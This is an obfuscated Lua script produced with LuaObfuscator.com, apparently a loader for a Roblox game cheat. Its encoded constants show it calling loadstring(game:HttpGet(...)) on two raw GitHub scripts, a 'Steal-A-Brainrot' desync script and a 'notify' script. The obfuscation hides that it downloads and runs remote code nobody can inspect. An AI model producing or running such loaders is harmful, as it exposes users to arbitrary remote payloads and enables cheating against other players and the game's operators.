--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v85=0;while true do if (v85==0) then v19=v0(v3(v30,1,1));return "";end end else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v122=0;local v123;while true do if (v122==1) then return v123;end if (v122==0) then v123=v5(v87,v19);v19=nil;v122=1;end end else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=0;local v89;while true do if (v88==(0 -0)) then v89=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-(620 -(555 + 64)))) + (932 -(857 + 12 + 62)))) ;return v89-(v89%1) ;end end else local v90=2^(v32-(569 -((1244 -(282 + 595)) + 201))) ;return (((v31%(v90 + v90))>=v90) and (928 -((1851 -(1523 + 114)) + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + 997)) );v18=v18 + (121 -(32 + 85)) ;return (v40 * 16777216) + (v39 * (66806 -(226 + 1044))) + (v38 * (1114 -858)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,1 + 0 ,977 -(892 + 65) ) * (((3 + 1) -2)^32)) + v41 ;local v45=v20(v42,38 -17 ,56 -25 );local v46=((v20(v42,382 -(87 + 263) )==1) and  -1) or (181 -(67 + 113)) ;if (v45==(0 + 0)) then if (v44==(0 -0)) then return v46 * (0 + 0) ;else v45=3 -2 ;v43=0;end elseif (v45==((3943 -944) -(802 + 150))) then return ((v44==(0 -0)) and (v46 * ((1 -0)/((1187 -(1069 + 118)) + 0)))) or (v46 * NaN) ;end return v8(v46,v45-(2020 -(915 + 82)) ) * (v43 + (v44/(((10 -5) -3)^52))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v65=1 + 0 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 -0 ;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(736 -(397 + 339))) then local v114=(function() return 438 -(262 + 176) ;end)();local v115=(function() return;end)();while true do if (v114==0) then v115=(function() return 1721 -(345 + 1376) ;end)();while true do if (v115==(689 -(198 + 490))) then v91=(function() return  #"|";end)();break;end if (v115~=0) then else v92=(function() return v93();end)();v94=(function() return nil;end)();v115=(function() return 1;end)();end end break;end end end if (v91~= #">") then else if (v92== #"~") then v94=(function() return v93()~=(0 -0) ;end)();elseif (v92==2) then v94=(function() return v95();end)();elseif (v92~= #"gha") then else v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v51=(function() return function(v99,v100,v101) local v102=(function() return 0;end)();while true do if (v102==(0 -0)) then v99[v100-#"\\" ]=(function() return v101();end)();return v99,v100,v101;end end end;end)();local v52=(function() return {};end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {v52,v53,nil,v54};end)();local v56=(function() return v23();end)();local v57=(function() return {};end)();for v67= #",",v56 do FlatIdent_12703,Type,v21,Cons,v24,v25,v57,v67=(function() return v50(FlatIdent_12703,Type,v21,Cons,v24,v25,v57,v67);end)();end v55[ #"-19"]=(function() return v21();end)();for v68= #",",v23() do local v69=(function() return v21();end)();if (v20(v69, #"<", #"[")~=(0 -0)) then else local v106=(function() return 0;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v106==3) then if (v20(v108, #"gha", #"asd")~= #"!") then else v109[ #".dev"]=(function() return v57[v109[ #".com"]];end)();end v52[v68]=(function() return v109;end)();break;end if (v106~=(1262 -(1091 + 171))) then else local v119=(function() return 0;end)();while true do if (v119==(0 + 0)) then local v130=(function() return 0;end)();while true do if ((3 -2)~=v130) then else v119=(function() return 1;end)();break;end if (v130==(0 -0)) then v107=(function() return v20(v69,2, #"gha");end)();v108=(function() return v20(v69, #"http",380 -(123 + 251) );end)();v130=(function() return 4 -3 ;end)();end end end if (v119==(699 -(208 + 490))) then v106=(function() return 1 + 0 ;end)();break;end end end if (v106==(1 + 0)) then local v120=(function() return 836 -(660 + 176) ;end)();local v121=(function() return;end)();while true do if ((0 + 0)==v120) then v121=(function() return 0;end)();while true do if (v121==(202 -(14 + 188))) then local v176=(function() return 0;end)();while true do if (v176~=0) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(675 -(534 + 141))) then local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182~=(0 + 0)) then else v183=(function() return 0 + 0 ;end)();while true do if (v183==0) then v109[ #"91("]=(function() return v22();end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"~") then v109[ #"gha"]=(function() return v23();end)();elseif (v107==2) then v109[ #"-19"]=(function() return v23() -((2 + 0)^16) ;end)();elseif (v107== #"-19") then local v188=(function() return 0 -0 ;end)();local v189=(function() return;end)();while true do if (v188==0) then v189=(function() return 0 -0 ;end)();while true do if (v189==(0 -0)) then v109[ #"xxx"]=(function() return v23() -(2^16) ;end)();v109[ #"http"]=(function() return v22();end)();break;end end break;end end end v176=(function() return 1;end)();end if (v176==(1 + 0)) then v121=(function() return 1;end)();break;end end end if (v121==(1 + 0)) then v106=(function() return 398 -(115 + 281) ;end)();break;end end break;end end end if (v106==2) then if (v20(v108, #"[", #" ")~= #">") then else v109[4 -2 ]=(function() return v57[v109[2]];end)();end if (v20(v108,2 + 0 ,4 -2 )== #"{") then v109[ #"91("]=(function() return v57[v109[ #"xnx"]];end)();end v106=(function() return 3;end)();end end end end for v70= #"!",v23() do v53,v70,v28=(function() return v51(v53,v70,v28);end)();end return v55;end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[2];local v64=v59[10 -7 ];return function(...) local v71=v62;local v72=v63;local v73=v64;local v74=v27;local v75=868 -(550 + 317) ;local v76= -(1 -0);local v77={};local v78={...};local v79=v12("#",...) -(2 -1) ;local v80={};local v81={};for v103=(73 + 212) -(134 + 151) ,v79 do if ((3106>1526) and (v103>=v73)) then v77[v103-v73 ]=v78[v103 + (1666 -(970 + 695)) ];else v81[v103]=v78[v103 + (1 -0) ];end end local v82=(v79-v73) + (1991 -(582 + 1408)) ;local v83;local v84;while true do v83=v71[v75];v84=v83[3 -2 ];if (v84<=((17 -11) -1)) then if ((3023<3870) and (v84<=(7 -5))) then if (v84<=(1824 -(1195 + 629))) then v81[v83[2 -0 ]]={};elseif (v84>1) then local v131=v83[243 -(187 + 54) ];local v132,v133=v74(v81[v131](v13(v81,v131 + ((2114 -1333) -(162 + 618)) ,v83[3 + 0 ])));v76=(v133 + v131) -(1 + 0) ;local v134=(114 -(4 + 110)) -(584 -(57 + 527)) ;for v168=v131,v76 do v134=v134 + (1 -0) ;v81[v168]=v132[v134];end else v81[v83[(1428 -(41 + 1386)) + 1 ]]();end elseif ((143>74) and (v84<=(1639 -(1373 + 263)))) then v81[v83[2]]=v83[1003 -(451 + 549) ];elseif (v84==(2 + 2)) then v75=v83[4 -(104 -(17 + 86)) ];else for v171=v83[2 -0 ],v83[3] do v81[v171]=nil;end end elseif (v84<=(1392 -(746 + 638))) then if (v84<=(3 + 3)) then do return;end elseif ((18<2112) and (v84==7)) then local v136=v83[2 -0 ];v81[v136]=v81[v136](v13(v81,v136 + (342 -(218 + 123)) ,v76));else local v138=1581 -(1535 + 46) ;local v139;local v140;while true do if (v138==(1 + 0)) then v81[v139 + 1 + 0 ]=v140;v81[v139]=v140[v83[564 -(306 + 254) ]];break;end if ((1097<=1628) and (v138==(0 + 0))) then v139=v83[3 -1 ];v140=v81[v83[1470 -(899 + 568) ]];v138=1 + 0 ;end end end elseif ((4630==4630) and (v84<=9)) then if (v81[v83[4 -2 ]]==v83[3 + 1 ]) then v75=v75 + (604 -(268 + 335)) ;else v75=v83[293 -(60 + 230) ];end elseif (v84==(582 -(426 + (325 -179)))) then v81[v83[1 + 1 ]]=v61[v83[1459 -(282 + 1174) ]];else local v144;local v145,v146;local v147;local v148;v81[v83[2]]=v61[v83[3]];v75=v75 + (812 -(569 + 242)) ;v83=v71[v75];v148=v83[2];v147=v81[v83[8 -5 ]];v81[v148 + 1 + 0 ]=v147;v81[v148]=v147[v83[1028 -(706 + 318) ]];v75=v75 + (1252 -(721 + 530)) ;v83=v71[v75];v81[v83[(3686 -2413) -(945 + 326) ]]=v83[7 -4 ];v75=v75 + 1 + 0 ;v83=v71[v75];v148=v83[702 -((437 -(122 + 44)) + 429) ];v145,v146=v74(v81[v148](v13(v81,v148 + 1 + (0 -0) ,v83[1503 -(1408 + 92) ])));v76=(v146 + v148) -(1087 -((1529 -1068) + 625)) ;v144=(1048 + 240) -(993 + 295) ;for v173=v148,v76 do v144=v144 + 1 + 0 ;v81[v173]=v145[v144];end v75=v75 + (1172 -(418 + 753)) ;v83=v71[v75];v148=v83[1 + 1 ];v81[v148]=v81[v148](v13(v81,v148 + 1 + 0 ,v76));v75=v75 + 1 + 0 + 0 ;v83=v71[v75];v81[v83[1 + 1 ]]();v75=v75 + ((1073 -543) -(406 + 123)) ;v83=v71[v75];v81[v83[1771 -(1749 + 20) ]]=v61[v83[68 -(30 + 35) ]];v75=v75 + 1 + 0 + 0 ;v83=v71[v75];v81[v83[1324 -(1249 + 73) ]]=v61[v83[3]];v75=v75 + 1 + 0 ;v83=v71[v75];v148=v83[2];v147=v81[v83[1148 -(466 + 679) ]];v81[v148 + (2 -1) ]=v147;v81[v148]=v147[v83[(1268 -(1043 + 214)) -(26 -19) ]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[1903 -((1318 -(323 + 889)) + 1794) ];end v75=v75 + (2 -1) + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403583Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B61692Q6D322F537465616C2D412D427261696E726F742F726566732F68656164732F6D61696E2F646573796E63626574612E6C756103063Q002Q747047657403473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F5361646F585465616D2F646174612F726566732F68656164732F6D61696E2F6E6F74696679001B9Q003Q001203000100014Q0005000200023Q0026090001000300010001002Q043Q00030001001203000200013Q0026090002000600010001002Q043Q0006000100120A000300023Q00120B000400033Q00202Q00040004000400122Q000600056Q000400066Q00033Q00024Q00030001000100122Q000300023Q00122Q000400033Q00202Q00040004000600122Q000600074Q0002000400064Q000700033Q00022Q0001000300010001002Q043Q001A0001002Q043Q00060001002Q043Q001A0001002Q043Q000300012Q00063Q00017Q00",v9(),...);
